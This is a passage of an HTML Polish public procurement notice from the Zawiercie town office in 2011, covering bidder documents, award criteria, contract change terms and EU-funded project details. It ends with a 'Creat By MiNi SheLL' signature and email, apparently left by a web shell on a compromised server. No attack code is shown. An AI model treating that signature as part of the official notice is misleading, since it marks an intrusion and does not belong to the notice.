<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca złoży wraz z ofertą:
1)	Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 5 do specyfikacji.
2)	Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, sporządzony według wzoru stanowiącego załącznik nr 6 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w przypadku, gdy:
1)	Nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu zamówienia, w tym zmiana stawki podatku VAT,
2)	Przekształcenia podmiotowego Wykonawcy, 
3)	Zmiany członków personelu kluczowego Wykonawcy w przypadku wystąpienia nieprzewidzianych okoliczności takich jak: śmierć osoby, rezygnacja / odejście z pracy lub innych uniemożliwiających należyte wykonywanie obowiązków zgodnie z umową lub obowiązującym prawem. W takim jednak przypadku każda nowa osoba musi spełniać warunki określone przez Zamawiającego na etapie wyboru oferty w postępowaniu przetargowym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zawiercie.bip.net.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, 42-400 Zawiercie, ul. Leśna 2, Wydział Zamówień Publicznych (pokój nr 202)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 10:00, miejsce: Urząd Miejski w Zawierciu,42-400 Zawiercie, ul. Leśna 2, Punkt Informacyjny (parter UM)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ogłoszenie o zamówieniu zostało zamieszczone w Biuletynie Zamówień Publicznych w dniu 16.12.2011 r.
Projektu pn. Przygotowanie terenów inwestycyjnych w Strefie Aktywności Gospodarczej - Obszar A w Zawierciu jest dofinansowany ze środków Programu Operacyjnego Innowacyjna Gospodarka 2007-2013 w ramach działania 6.2 Rozwój sieci centrów obsługi inwestorów i eksporterów oraz powstawanie nowych terenów inwestycyjnych, poddziałanie 6.2.2 Wsparcie działań studyjno-koncepcyjnych w ramach przygotowania terenów inwestycyjnych dla projektów inwestycyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com